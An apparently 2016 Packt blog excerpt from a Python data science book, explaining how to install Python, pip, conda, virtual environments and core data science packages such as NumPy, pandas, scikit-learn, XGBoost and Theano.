Getting Started with Python Packages

Packt
02 Nov 2016
37 min read
In this article by Luca Massaron and Alberto Boschetti, the authors of the book Python Data Science Essentials - Second Edition, we will cover the steps for installing Python, look at the different installation packages, and take a glance at the essential packages that will constitute a complete data science toolbox. Whether you are an eager learner of data science or a well-grounded data science practitioner, you can take advantage of this essential introduction to Python for data science. You can use it to the fullest if you already have at least some previous experience in basic coding, in writing general-purpose computer programs in Python, or in some other data-analysis-specific language such as MATLAB or R.

Introducing data science and Python

Data science is a relatively new knowledge domain, though its core components have been studied and researched for many years by the computer science community. Its components include linear algebra, statistical modelling, visualization, computational linguistics, graph analysis, machine learning, business intelligence, and data storage and retrieval. Data science is a new domain and you have to take into consideration that currently its frontiers are still somewhat blurred and dynamic. Since data science is made up of various constituent sets of disciplines, please also keep in mind that there are different profiles of data scientists depending on their competencies and areas of expertise.

In such a situation, what can be the best tool of the trade that you can learn and effectively use in your career as a data scientist? We believe that the best tool is Python, and we intend to provide you with all the essential information that you will need for a quick start. In addition, other tools such as R and MATLAB provide data scientists with specialized tools to solve specific problems in statistical analysis and matrix manipulation in data science. However, only Python really completes your data scientist skill set. This multipurpose language is suitable for both development and production alike; it can handle small- to large-scale data problems and it is easy to learn and grasp no matter what your background or experience is.

Created in 1991 as a general-purpose, interpreted, and object-oriented language, Python has slowly and steadily conquered the scientific community and grown into a mature ecosystem of specialized packages for data processing and analysis. It allows for countless fast experiments, easy theory development, and prompt deployment of scientific applications. At present, the core Python characteristics that render it an indispensable data science tool are as follows:

It offers a large, mature system of packages for data analysis and machine learning. It guarantees that you will get all that you may need in the course of a data analysis, and sometimes even more.

Python can easily integrate different tools and offers a truly unifying ground for different languages, data strategies, and learning algorithms that can be fitted together easily and which can concretely help data scientists forge powerful solutions. There are packages that allow you to call code in other languages (Java, C, FORTRAN, R, or Julia), outsourcing some of the computations to them and improving your script performance.

It is very versatile. No matter what your programming background or style is (object-oriented, procedural, or even functional), you will enjoy programming with Python.
It is cross-platform; your solutions will work perfectly and smoothly on Windows, Linux, and Mac OS systems. You won't have to worry all that much about portability.

Although interpreted, it is undoubtedly fast compared to other mainstream data analysis languages such as R and MATLAB (though it is not comparable to C, Java, and the newly emerged Julia language). Moreover, there are also static compilers such as Cython or just-in-time compilers such as PyPy that can transform Python code into C for higher performance.

It can work with large in-memory data because of its minimal memory footprint and excellent memory management. The memory garbage collector will often save the day when you load, transform, dice, slice, save, or discard data using various iterations and reiterations of data wrangling.

It is very simple to learn and use. After you grasp the basics, there's no better way to learn more than by immediately starting with the coding.

Moreover, the number of data scientists using Python is continuously growing: new packages and improvements are released by the community every day, making the Python ecosystem an increasingly prolific and rich environment for data science.

Installing Python

First, let's proceed to introduce all the settings you need in order to create a fully working data science environment to test the examples and experiment with the code that we are going to provide you with. Python is an open source, object-oriented, and cross-platform programming language. Compared to some of its direct competitors (for instance, C++ or Java), Python is very concise. It allows you to build a working software prototype in a very short time. Yet it has become the most used language in the data scientist's toolbox not just because of that. It is also a general-purpose language, and it is very flexible due to a variety of available packages that solve a wide spectrum of problems and necessities.

Python 2 or Python 3?

There are two main branches of Python: 2.7.x and 3.x. At the time of writing this article, the Python Foundation (www.python.org) is offering downloads for Python versions 2.7.11 and 3.5.1. Although the third version is the newest, the older one is still the most used version in the scientific area, since a few packages (check the website py3readiness.org for a compatibility overview) don't yet run on Python 3. In addition, there is no immediate backward compatibility between Python 3 and 2. In fact, if you try to run some code developed for Python 2 with a Python 3 interpreter, it may not work. Major changes have been made to the newest version, and that has affected past compatibility. Some data scientists, having built most of their work on Python 2 and its packages, are reluctant to switch to the new version.

We intend to address a larger audience of data scientists, data analysts, and developers, who may not have such a strong legacy with Python 2. Thus, we agreed that it would be better to work with Python 3 rather than the older version. We suggest using a version such as Python 3.4 or above. After all, Python 3 is the present and the future of Python. It is the only version that will be further developed and improved by the Python Foundation and it will be the default version of the future on many operating systems. Anyway, if you are currently working with version 2 and you prefer to keep on working with it, you can still run the examples.
In fact, for the most part, our code will simply work on Python 2 after the code itself has been preceded by these imports:

from __future__ import (absolute_import, division, print_function, unicode_literals)
from builtins import *
from future import standard_library
standard_library.install_aliases()

The from __future__ import commands should always occur at the beginning of your scripts or else Python may report an error. As described on the Python-future website (python-future.org), these imports will help convert several Python 3-only constructs to a form compatible with both Python 3 and Python 2 (and in any case, most Python 3 code should simply work on Python 2 even without the aforementioned imports). In order to run the preceding commands successfully, if the future package is not already available on your system, you should install it (version >= 0.15.2) using the following command, to be executed from a shell:

$> pip install -U future

If you're interested in understanding the differences between Python 2 and Python 3 further, we recommend reading the wiki page offered by the Python Foundation itself: wiki.python.org/moin/Python2orPython3.

Step-by-step installation

Novice data scientists who have never used Python (and who likely don't have the language readily installed on their machines) need to first download the installer from the main website of the project, www.python.org/downloads/, and then install it on their local machine. We will now cover the steps which will provide you with full control over what can be installed on your machine. This is very useful when you have to set up single machines to deal with different tasks in data science. Anyway, please be warned that a step-by-step installation really takes time and effort. Instead, installing a ready-made scientific distribution will lessen the burden of the installation procedure and may be well suited when you are first starting and learning, because it saves you time and sometimes even trouble, though it will put a large number of packages (most of which we won't use) on your computer all at once.

Python being a multiplatform programming language, you'll find installers for machines that either run on Windows or Unix-like operating systems. Please remember that some of the latest versions of most Linux distributions (such as CentOS, Fedora, Red Hat Enterprise, and Ubuntu) have Python 2 packaged in the repository. In such a case, and in the case that you already have a Python version on your computer (since our examples run on Python 3), you first have to check exactly which version you are running. To do such a check, just follow these instructions:

Open a Python shell: type python in the terminal, or click on any Python icon you find on your system. Then, after Python has started, test the installation by running the following code in the Python interactive shell or REPL:

>>> import sys
>>> print (sys.version_info)

If you can read that your Python version has the major=2 attribute, it means that you are running a Python 2 instance. Otherwise, if the attribute is valued 3, or if the print statement reports back to you something like v3.x.x (for instance v3.5.1), you are running the right version of Python and you are ready to move forward.

To clarify the operations we have just mentioned, when a command is given in the terminal command line, we prefix the command with $>. Otherwise, if it's for the Python REPL, it's preceded by >>>.
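Putting these pieces together, here is a small sketch (not from the original article) of a script header that applies the compatibility imports and then checks, at run time, that the interpreter is recent enough; the minimum version used here is only an illustrative threshold:

# Sketch: a script header combining the compatibility imports with a version check.
# Requires the 'future' package (pip install -U future), as described above.
from __future__ import (absolute_import, division,
                        print_function, unicode_literals)
from builtins import *
from future import standard_library
standard_library.install_aliases()

import sys

# Warn if we are not on Python 3.4 or newer (an illustrative minimum).
if sys.version_info < (3, 4):
    print("Warning: running on Python %d.%d; the examples target Python 3.4+"
          % sys.version_info[:2])

print(7 / 2)  # with the division import, prints 3.5 on both Python 2 and 3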
The installation of packages

Python won't come bundled with everything you need, unless you take a specific premade distribution. Therefore, to install the packages you need, you can use either pip or easy_install. Both of these tools run in the command line and make the process of installation, upgrade, and removal of Python packages a breeze. To check which tools have been installed on your local machine, run the following command:

$> pip

To install pip, follow the instructions given at pip.pypa.io/en/latest/installing.html. Alternatively, you can also run this command:

$> easy_install

If both of these commands end up with an error, you need to install one of them. We recommend that you use pip because it is thought of as an improvement over easy_install. Moreover, easy_install is going to be dropped in the future and pip has important advantages over it. It is preferable to install everything using pip because: it is the preferred package manager for Python 3; starting with Python 2.7.9 and Python 3.4, it is included by default with the Python binary installers; it provides an uninstall functionality; and it rolls back and leaves your system clean if, for whatever reason, the package installation fails.

Using easy_install in spite of pip's advantages makes sense if you are working on Windows, because pip won't always install pre-compiled binary packages. Sometimes it will try to build the package's extensions directly from C source, thus requiring a properly configured compiler (and that's not an easy task on Windows). This depends on whether the package relies on eggs (pip cannot directly use their binaries, but needs to build them from their source code) or wheels (in this case, pip can install binaries if available, as explained here: pythonwheels.com/). Instead, easy_install will always install available binaries from eggs and wheels. Therefore, if you are experiencing unexpected difficulties installing a package, easy_install can save your day (at some price anyway, as we just mentioned).

The most recent versions of Python should already have pip installed by default. Therefore, you may have it already installed on your system. If not, the safest way is to download the get-pip.py script from bootstrap.pypa.io/get-pip.py and then run it using the following:

$> python get-pip.py

The script will also install the setup tool from pypi.python.org/pypi/setuptools, which also contains easy_install.

You're now ready to install the packages you need in order to run the examples provided in this article. To install the <package-name> generic package, you just need to run this command:

$> pip install <package-name>

Alternatively, you can run the following command:

$> easy_install <package-name>

Note that on some systems, pip might be named pip3 and easy_install as easy_install-3 to stress the fact that both operate on packages for Python 3. If you're unsure, check the version of Python pip is operating on with:

$> pip -V

For easy_install, the command is slightly different:

$> easy_install --version

After this, the <package-name> package and all its dependencies will be downloaded and installed. If you're not certain whether a library has been installed or not, just try to import a module inside it. If the Python interpreter raises an ImportError, it can be concluded that the package has not been installed.
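In a script, the same check can be wrapped in a try/except block; here is a small sketch (not from the original article) using NumPy as the example package:

import importlib

package = "numpy"  # any module name you want to test
try:
    module = importlib.import_module(package)
    # Most scientific packages expose their version as __version__
    print(package, "is installed, version:", getattr(module, "__version__", "unknown"))
except ImportError:
    print(package, "is not installed; try: pip install", package)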
This is what happens when the NumPy library has been installed:

>>> import numpy

This is what happens if it's not installed:

>>> import numpy
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ImportError: No module named numpy

In the latter case, you'll need to first install it through pip or easy_install. Take care that you don't confuse packages with modules. With pip, you install a package; in Python, you import a module. Sometimes, the package and the module have the same name, but in many cases, they don't match. For example, the sklearn module is included in the package named Scikit-learn. Finally, to search and browse the Python packages available for Python, look at pypi.python.org.

Package upgrades

More often than not, you will find yourself in a situation where you have to upgrade a package because either the new version is required by a dependency or it has additional features that you would like to use. First, check the version of the library you have installed by glancing at the __version__ attribute, as shown in the following example with numpy:

>>> import numpy
>>> numpy.__version__ # 2 underscores before and after
'1.9.2'

Now, if you want to update it to a newer release, say the 1.11.0 version, you can run the following command from the command line:

$> pip install -U numpy==1.11.0

Alternatively, you can use the following command:

$> easy_install --upgrade numpy==1.11.0

Finally, if you're interested in upgrading it to the latest available version, simply run this command:

$> pip install -U numpy

You can alternatively run the following command:

$> easy_install --upgrade numpy

Scientific distributions

As you've read so far, creating a working environment is a time-consuming operation for a data scientist. You first need to install Python and then, one by one, you can install all the libraries that you will need (sometimes, the installation procedures may not go as smoothly as you'd hoped for earlier). If you want to save time and effort and want to ensure that you have a fully working Python environment that is ready to use, you can just download, install, and use a scientific Python distribution. Apart from Python, such distributions also include a variety of preinstalled packages, and sometimes they even have additional tools and an IDE. A few of them are very well known among data scientists, and in the following content, you will find some of the key features of each of these distributions. We suggest that you promptly download and install a scientific distribution, such as Anaconda (which is the most complete one).

Anaconda (continuum.io/downloads) is a Python distribution offered by Continuum Analytics that includes nearly 200 packages, which include NumPy, SciPy, pandas, Jupyter, Matplotlib, Scikit-learn, and NLTK. It's a cross-platform distribution (Windows, Linux, and Mac OS X) that can be installed on machines with other existing Python distributions and versions. Its base version is free, while add-ons that contain advanced features are charged separately. Anaconda introduces conda, a binary package manager, as a command-line tool to manage your package installations. As stated on the website, Anaconda's goal is to provide an enterprise-ready Python distribution for large-scale processing, predictive analytics, and scientific computing.

Leveraging conda to install packages

If you've decided to install an Anaconda distribution, you can take advantage of the conda binary installer we mentioned previously.
Anyway, conda is an open source package management system, and consequently it can be installed separately from an Anaconda distribution. You can immediately test whether conda is available on your system. Open a shell and type:

$> conda -V

If conda is available, the version of your conda installation will be displayed; otherwise an error will be reported. If conda is not available, you can quickly install it on your system by going to conda.pydata.org/miniconda.html and installing the Miniconda software suitable for your computer. Miniconda is a minimal installation that only includes conda and its dependencies.

conda can help you with two tasks: installing packages and creating virtual environments. In this section, we will explore how conda can help you easily install most of the packages you may need in your data science projects. Before starting, please make sure you have the latest version of conda at hand:

$> conda update conda

Now you can install any package you need. To install the <package-name> generic package, you just need to run the following command:

$> conda install <package-name>

You can also install a particular version of the package just by pointing it out:

$> conda install <package-name>=1.11.0

Similarly, you can install multiple packages at once by listing all their names:

$> conda install <package-name-1> <package-name-2>

If you just need to update a package that you previously installed, you can keep on using conda:

$> conda update <package-name>

You can update all the available packages simply by using the --all argument:

$> conda update --all

Finally, conda can also uninstall packages for you:

$> conda remove <package-name>

If you would like to know more about conda, you can read its documentation at conda.pydata.org/docs/index.html. In summary, as its main advantage, it handles binaries even better than easy_install (by always providing a successful installation on Windows without any need to compile the packages from source) but without easy_install's problems and limitations. With the use of conda, packages are easy to install (and installation is always successful), update, and even uninstall. On the other hand, conda cannot install directly from a git server (so it cannot access the latest version of many packages under development) and it doesn't cover all the packages available on PyPI, as pip itself does.

Enthought Canopy

Enthought Canopy (enthought.com/products/canopy) is a Python distribution by Enthought Inc. It includes more than 200 preinstalled packages, such as NumPy, SciPy, Matplotlib, Jupyter, and pandas. This distribution is targeted at engineers, data scientists, quantitative and data analysts, and enterprises. Its base version is free (and is named Canopy Express), but if you need advanced features, you have to buy a full version. It's a multiplatform distribution and its command-line install tool is canopy_cli.

PythonXY

PythonXY (python-xy.github.io) is a free, open source Python distribution maintained by the community. It includes a number of packages, such as NumPy, SciPy, NetworkX, Jupyter, and Scikit-learn. It also includes Spyder, an interactive development environment inspired by the MATLAB IDE. The distribution is free. It works only on Microsoft Windows, and its command-line installation tool is pip.

WinPython

WinPython (winpython.sourceforge.net) is also a free, open-source Python distribution maintained by the community. It is designed for scientists, and includes many packages such as NumPy, SciPy, Matplotlib, and Jupyter.
It also includes Spyder as an IDE. It is free and portable. You can put WinPython into any directory, or even onto a USB flash drive, and at the same time maintain multiple copies and versions of it on your system. It works only on Microsoft Windows, and its command-line tool is the WinPython Package Manager (WPPM).

Explaining virtual environments

No matter whether you have chosen to install a stand-alone Python or a scientific distribution, you may have noticed that on your system you are actually bound to the Python version you have installed. The only exception, for Windows users, is to use a WinPython distribution, since it is a portable installation and you can have as many different installations as you need. A simple solution to break free of such a limitation is to use virtualenv, a tool for creating isolated Python environments. By using different Python environments, you can easily achieve these things:

Testing any new package installation or doing experimentation on your Python environment without any fear of breaking anything in an irreparable way. In this case, you need a version of Python that acts as a sandbox.

Having at hand multiple Python versions (both Python 2 and Python 3), geared with different versions of installed packages. This can help you in dealing with different versions of Python for different purposes (for instance, on Windows, some of the packages we are going to present only work with Python 3.4, which is not the latest release).

Taking a replicable snapshot of your Python environment easily and having your data science prototypes work smoothly on any other computer or in production. In this case, your main concern is the immutability and replicability of your working environment.

You can find documentation about virtualenv at virtualenv.readthedocs.io/en/stable, though we are going to provide you with all the directions you need to start using it immediately. In order to take advantage of virtualenv, you first have to install it on your system:

$> pip install virtualenv

After the installation completes, you can start building your virtual environments. Before proceeding, you have to make a few decisions:

If you have more versions of Python installed on your system, you have to decide which version to pick up. Otherwise, virtualenv will take the Python version virtualenv was installed by on your system. In order to set a different Python version, you have to pass the argument -p followed by the version of Python you want, or the path of the Python executable to be used (for instance, -p python2.7, or just pointing to a Python executable such as -p C:\Anaconda2\python.exe).

With virtualenv, when required to install a certain package, it will install it from scratch, even if it is already available at a system level (in the Python directory you created the virtual environment from). This default behavior makes sense because it allows you to create a completely separated empty environment. In order to save disk space and limit the installation time of all the packages, you may instead decide to take advantage of already available packages on your system by using the argument --system-site-packages.

You may want to be able to later move your virtual environment across Python installations, or even among different machines. In that case, you may want to make the functioning of all of the environment's scripts relative to the path it is placed in by using the argument --relocatable.
After deciding on the Python version, the linking to existing global packages, and the relocatability of the virtual environment, in order to start, you just launch the command from a shell, declaring the name you would like to assign to your new environment:

$> virtualenv clone

virtualenv will just create a new directory using the name you provided, in the path from which you actually launched the command. To start using it, you just enter the directory and type activate:

$> cd clone
$> activate

At this point, you can start working in your separated Python environment, installing packages and working with code. If you need to install multiple packages at once, you may need a special function of pip, pip freeze, which will list all the packages (and their versions) you have installed on your system. You can record the entire list in a text file with this command:

$> pip freeze > requirements.txt

After saving the list in a text file, just take it into your virtual environment and install all the packages in a breeze with a single command:

$> pip install -r requirements.txt

Each package will be installed according to the order in the list (packages are listed in a case-insensitive sorted order). If a package requires other packages that are later in the list, that's not a big deal because pip automatically manages such situations. So if your package requires NumPy and NumPy is not yet installed, pip will install it first.

When you're finished installing packages and using your environment for scripting and experimenting, in order to return to your system defaults, just issue this command:

$> deactivate

If you want to remove the virtual environment completely, after deactivating and getting out of the environment's directory, you just have to get rid of the environment's directory itself by a recursive deletion. For instance, on Windows you just do this:

$> rd /s /q clone

On Linux and Mac, the command will be:

$> rm -r -f clone

If you are working extensively with virtual environments, you should consider using virtualenvwrapper, which is a set of wrappers for virtualenv that helps you manage multiple virtual environments easily. It can be found at bitbucket.org/dhellmann/virtualenvwrapper. If you are operating on a Unix system (Linux or OS X), another solution we have to mention is pyenv (which can be found at https://github.com/yyuu/pyenv). It lets you set your main Python version, allows the installation of multiple versions, and creates virtual environments. Its peculiarity is that it does not depend on Python being installed and it works perfectly at the user level (no need for sudo commands).

conda for managing environments

If you have installed the Anaconda distribution, or you have tried conda using a Miniconda installation, you can also take advantage of the conda command to run virtual environments as an alternative to virtualenv. Let's see in practice how to use conda for that. We can check what environments we have available like this:

$> conda info -e

This command will report what environments you can use on your system based on conda. Most likely, your only environment will be just "root", pointing to your Anaconda distribution's folder.

As an example, we can create an environment based on Python version 3.4, having all the necessary Anaconda-packaged libraries installed. That makes sense, for instance, for using the package Theano together with Python 3 on Windows (because of an issue we will explain in a few paragraphs).
In order to create such an environment, just do:

$> conda create -n python34 python=3.4 anaconda

The command asks for a particular Python version (3.4) and requires the installation of all the packages available in the Anaconda distribution (the argument anaconda). It names the environment python34 using the argument -n. The complete installation should take a while, given the large number of packages in the Anaconda installation. After the installation is completed, you can activate the environment:

$> activate python34

If you need to install additional packages in your environment, once it is activated, you just do:

$> conda install -n python34 <package-name1> <package-name2>

That is, you make the list of the required packages follow the name of your environment. Naturally, you can also use pip install, as you would do in a virtualenv environment. You can also use a file instead of listing all the packages by name yourself. You can create a list of the packages in an environment using the list argument and piping the output to a file:

$> conda list -e > requirements.txt

Then, in your target environment, you can install the entire list using:

$> conda install --file requirements.txt

You can even create an environment based on a requirements list:

$> conda create -n python34 python=3.4 --file requirements.txt

Finally, after having used the environment, to close the session, you simply do this:

$> deactivate

Contrary to virtualenv, there is a specialized argument in order to completely remove an environment from your system:

$> conda remove -n python34 --all

A glance at the essential packages

We mentioned that the two most relevant characteristics of Python are its ability to integrate with other languages and its mature package system, which is well embodied by PyPI (the Python Package Index: pypi.python.org/pypi), a common repository for the majority of Python open source packages that is constantly maintained and updated. The packages that we are now going to introduce are strongly analytical and they will constitute a complete data science toolbox. All the packages are made up of extensively tested and highly optimized functions for both memory usage and performance, ready to achieve any scripting operation with successful execution. A walkthrough on how to install them is provided next. Partially inspired by similar tools present in R and MATLAB environments, we will together explore how a few selected Python commands can allow you to efficiently handle data and then explore, transform, experiment, and learn from it without having to write too much code or reinvent the wheel.

NumPy

NumPy, which is Travis Oliphant's creation, is the true analytical workhorse of the Python language. It provides the user with multidimensional arrays, along with a large set of functions to perform a multiplicity of mathematical operations on these arrays. Arrays are blocks of data arranged along multiple dimensions, which implement mathematical vectors and matrices.
Characterized by optimal memory allocation, arrays are useful not just for storing data, but also for fast matrix operations (vectorization), which are indispensable when you wish to solve ad hoc data science problems:

Website: www.numpy.org
Version at the time of print: 1.11.0
Suggested install command: pip install numpy

As a convention largely adopted by the Python community, when importing NumPy, it is suggested that you alias it as np:

import numpy as np

SciPy

An original project by Travis Oliphant, Pearu Peterson, and Eric Jones, SciPy completes NumPy's functionalities, offering a larger variety of scientific algorithms for linear algebra, sparse matrices, signal and image processing, optimization, fast Fourier transformation, and much more:

Website: www.scipy.org
Version at the time of print: 0.17.1
Suggested install command: pip install scipy

pandas

The pandas package deals with everything that NumPy and SciPy cannot do. Thanks to its specific data structures, namely DataFrames and Series, pandas allows you to handle complex tables of data of different types (which is something that NumPy's arrays cannot do) and time series. Thanks to Wes McKinney's creation, you will be able to easily and smoothly load data from a variety of sources. You can then slice, dice, handle missing elements, add, rename, aggregate, reshape, and finally visualize your data at will:

Website: pandas.pydata.org
Version at the time of print: 0.18.1
Suggested install command: pip install pandas

Conventionally, pandas is imported as pd:

import pandas as pd

Scikit-learn

Started as part of the SciKits (SciPy Toolkits), Scikit-learn is the core of data science operations in Python. It offers all that you may need in terms of data preprocessing, supervised and unsupervised learning, model selection, validation, and error metrics. Scikit-learn started in 2007 as a Google Summer of Code project by David Cournapeau. Since 2013, it has been taken over by the researchers at INRIA (the French Institute for Research in Computer Science and Automation):

Website: scikit-learn.org/stable
Version at the time of print: 0.17.1
Suggested install command: pip install scikit-learn

Note that the imported module is named sklearn.

Jupyter

A scientific approach requires the fast experimentation of different hypotheses in a reproducible fashion. Initially named IPython and limited to working only with the Python language, Jupyter was created by Fernando Perez in order to address the need for an interactive Python command shell (based on the shell, web browser, and application interface), with graphical integration, customizable commands, rich history (in the JSON format), and computational parallelism for enhanced performance. Jupyter is our favoured choice; it is used to clearly and effectively illustrate operations with scripts and data, and the consequent results:

Website: jupyter.org
Version at the time of print: 1.0.0 (ipykernel = 4.3.1)
Suggested install command: pip install jupyter
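To give a minimal feel for the conventions introduced so far, here is a tiny sketch (toy data, not from the original article) that uses the np and pd aliases described above:

import numpy as np
import pandas as pd

# A 2x3 NumPy array and a vectorized operation (no explicit Python loop).
a = np.arange(6).reshape(2, 3)
print(a * 10)

# A small pandas DataFrame with mixed column types, plus a quick summary.
df = pd.DataFrame({"label": ["a", "b", "c"], "value": [1.5, 2.0, 3.5]})
print(df.describe())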
Matplotlib

Originally developed by John Hunter, matplotlib is the library that contains all the building blocks required to create quality plots from arrays and to visualize them interactively. You can find all the MATLAB-like plotting frameworks inside the pylab module:

Website: matplotlib.org
Version at the time of print: 1.5.1
Suggested install command: pip install matplotlib

You can simply import what you need for your visualization purposes with the following command:

import matplotlib.pyplot as plt

Statsmodels

Previously part of SciKits, statsmodels was conceived as a complement to SciPy's statistical functions. It features generalized linear models, discrete choice models, time series analysis, and a series of descriptive statistics as well as parametric and nonparametric tests:

Website: statsmodels.sourceforge.net
Version at the time of print: 0.6.1
Suggested install command: pip install statsmodels

Beautiful Soup

Beautiful Soup, a creation of Leonard Richardson, is a great tool for scraping data out of HTML and XML files retrieved from the Internet. It works incredibly well, even in the case of tag soups (hence the name), which are collections of malformed, contradictory, and incorrect tags. After choosing your parser (the HTML parser included in Python's standard library works fine), thanks to Beautiful Soup, you can navigate through the objects in the page and extract text, tables, and any other information that you may find useful:

Website: www.crummy.com/software/BeautifulSoup
Version at the time of print: 4.4.1
Suggested install command: pip install beautifulsoup4

Note that the imported module is named bs4.

NetworkX

Developed by the Los Alamos National Laboratory, NetworkX is a package specialized in the creation, manipulation, analysis, and graphical representation of real-life network data (it can easily operate with graphs made up of a million nodes and edges). Besides specialized data structures for graphs and fine visualization methods (2D and 3D), it provides the user with many standard graph measures and algorithms, such as the shortest path, centrality, components, communities, clustering, and PageRank:

Website: networkx.github.io
Version at the time of print: 1.11
Suggested install command: pip install networkx

Conventionally, NetworkX is imported as nx:

import networkx as nx

NLTK

The Natural Language Toolkit (NLTK) provides access to corpora and lexical resources and to a complete suite of functions for statistical Natural Language Processing (NLP), ranging from tokenizers to part-of-speech taggers and from tree models to named-entity recognition. Initially, Steven Bird and Edward Loper created the package as an NLP teaching infrastructure for their course at the University of Pennsylvania. Now, it is a fantastic tool that you can use to prototype and build NLP systems:

Website: www.nltk.org
Version at the time of print: 3.2.1
Suggested install command: pip install nltk

Gensim

Gensim, programmed by Radim Rehurek, is an open source package that is suitable for the analysis of large textual collections with the help of parallel, distributable, online algorithms. Among its advanced functionalities, it implements Latent Semantic Analysis (LSA), topic modelling by Latent Dirichlet Allocation (LDA), and Google's word2vec, a powerful algorithm that transforms text into vector features that can be used in supervised and unsupervised machine learning:

Website: radimrehurek.com/gensim
Version at the time of print: 0.12.4
Suggested install command: pip install gensim
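Looping back to Beautiful Soup for a moment, here is a minimal parsing sketch (toy HTML, not from the original article) of the kind of extraction described above:

from bs4 import BeautifulSoup

html = "<html><body><p class='title'>Packages</p><p>NumPy</p><p>pandas</p></body></html>"
soup = BeautifulSoup(html, "html.parser")  # the parser from Python's standard library

print(soup.find("p", class_="title").text)       # -> Packages
print([p.text for p in soup.find_all("p")[1:]])  # -> ['NumPy', 'pandas']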
PyPy

PyPy is not a package; it is an alternative implementation of Python 2.7.8 that supports most of the commonly used Python standard packages (unfortunately, NumPy is currently not fully supported). As an advantage, it offers enhanced speed and memory handling. Thus, it is very useful for heavy-duty operations on large chunks of data and it should be part of your big data handling strategies:

Website: pypy.org/
Version at the time of print: 5.1
Download page: pypy.org/download.html

XGBoost

XGBoost is a scalable, portable, and distributed gradient boosting library (a tree ensemble machine learning algorithm). Initially created by Tianqi Chen from Washington University, it has been enriched with a Python wrapper by Bing Xu and an R interface by Tong He (you can read the story behind XGBoost directly from its principal creator at homes.cs.washington.edu/~tqchen/2016/03/10/story-and-lessons-behind-the-evolution-of-xgboost.html). XGBoost is available for Python, R, Java, Scala, Julia, and C++, and it can work on a single machine (leveraging multithreading) as well as in Hadoop and Spark clusters:

Website: xgboost.readthedocs.io/en/latest
Version at the time of print: 0.4
Download page: github.com/dmlc/xgboost

Detailed instructions for installing XGBoost on your system can be found at this page: github.com/dmlc/xgboost/blob/master/doc/build.md

The installation of XGBoost on both Linux and Mac OS is quite straightforward, whereas it is a little bit trickier for Windows users. For this reason, we provide specific installation steps to get XGBoost working on Windows:

First, download and install Git for Windows (git-for-windows.github.io). Then you need a MinGW compiler present on your system. You can download it from www.mingw.org according to the characteristics of your system. From the command line, execute:

$> git clone --recursive https://github.com/dmlc/xgboost
$> cd xgboost
$> git submodule init
$> git submodule update

Then, still from the command line, copy the configuration for 64-bit systems to be the default one:

$> copy make\mingw64.mk config.mk

Alternatively, you can just copy the plain 32-bit version:

$> copy make\mingw.mk config.mk

After copying the configuration file, you can run the compiler, setting it to use four threads in order to speed up the compiling procedure:

$> mingw32-make -j4

In MinGW, the make command comes with the name mingw32-make. If you are using a different compiler, the previous command may not work; in that case, you can simply try:

$> make -j4

Finally, if the compiler completes its work without errors, you can install the package into your Python with this:

$> cd python-package
$> python setup.py install

After following all the preceding instructions, if you try to import XGBoost in Python and it doesn't load and results in an error, it may well be that Python cannot find MinGW's g++ runtime libraries. You just need to find the location of MinGW's binaries on your computer (in our case, it was in C:\mingw-w64\mingw64\bin; just modify the following code to use yours) and place the following code snippet before importing XGBoost:

import os
# Note the raw string, so the backslashes in the Windows path are kept literally.
mingw_path = r'C:\mingw-w64\mingw64\bin'
os.environ['PATH'] = mingw_path + ';' + os.environ['PATH']
import xgboost as xgb

Depending on the state of the XGBoost project, similarly to many other projects under continuous development, the preceding installation commands may or may not temporarily work at the time you try them. Usually waiting for an update of the project or opening an issue with the authors of the package may solve the problem.
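Once the import succeeds, a tiny smoke test on toy data can confirm that the library is usable; the following sketch (not from the original article) assumes your XGBoost build includes the scikit-learn-style wrapper:

import numpy as np
import xgboost as xgb

# Toy data: 20 samples, 3 features, with a label derived from the first feature.
X = np.random.rand(20, 3)
y = (X[:, 0] > 0.5).astype(int)

model = xgb.XGBClassifier(n_estimators=5)  # a deliberately small model
model.fit(X, y)
print(model.predict(X[:5]))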
Theano

Theano is a Python library that allows you to define, optimize, and evaluate mathematical expressions involving multi-dimensional arrays efficiently. Basically, it provides you with all the building blocks you need to create deep neural networks. Created by academics (an entire development team; you can read their names in their most recent paper at arxiv.org/pdf/1605.02688.pdf), Theano has been used for large-scale and intensive computations since 2007:

Website: deeplearning.net/software/theano
Release at the time of print: 0.8.2

In spite of the many installation problems experienced by users in the past (especially Windows users), the installation of Theano should be straightforward, the package now being available on PyPI:

$> pip install Theano

If you want the most updated version of the package, you can get it by cloning from GitHub:

$> git clone git://github.com/Theano/Theano.git

Then you can proceed with a direct Python installation:

$> cd Theano
$> python setup.py install

To test your installation, you can run the following from a shell/CMD and verify the reports:

$> pip install nose
$> pip install nose-parameterized
$> nosetests theano

If you are working on a Windows OS and the previous instructions don't work, you can try these steps using the conda command provided by the Anaconda distribution. Install TDM GCC x64 (this can be found at tdm-gcc.tdragon.net), then open an Anaconda prompt interface and execute:

$> conda update conda
$> conda update --all
$> conda install mingw libpython
$> pip install git+git://github.com/Theano/Theano.git

Theano needs libpython, which isn't yet compatible with version 3.5. So if your Windows installation is not working, this could be the likely cause. Anyway, Theano installs perfectly on Python version 3.4. Our suggestion in this case is to create a virtual Python environment based on version 3.4, and install and use Theano only on that specific version. Directions on how to create virtual environments are provided in the paragraphs about virtualenv and conda create. In addition, Theano's website provides some information for Windows users; it could support you when everything else fails: deeplearning.net/software/theano/install_windows.html

An important requirement for Theano to scale out on GPUs is to install the Nvidia CUDA drivers and SDK for code generation and execution on the GPU. If you do not know much about the CUDA Toolkit, you can start from this web page in order to understand more about the technology being used: developer.nvidia.com/cuda-toolkit Therefore, if your computer has an NVidia GPU, you can find all the necessary instructions in order to install CUDA using this tutorial page from NVidia itself: docs.nvidia.com/cuda/cuda-quick-start-guide/index.html

Keras

Keras is a minimalist and highly modular neural networks library, written in Python and capable of running on top of either Theano or TensorFlow (the open source software library for numerical computation released by Google). Keras was created by François Chollet, a machine learning researcher working at Google:

Website: keras.io
Version at the time of print: 1.0.3
Suggested installation from PyPI:

$> pip install keras

As an alternative, you can install the latest available version (which is advisable since the package is in continuous development) using the command:

$> pip install git+git://github.com/fchollet/keras.git

Summary

In this article, we performed a lot of installations, from Python packages to examples. They were installed either directly or by using a scientific distribution. We also introduced Jupyter notebooks and demonstrated how you can have access to the data run in the tutorials.

Why secure web-based applications with Kali Linux?

Guest Contributor
12 Dec 2019
12 min read
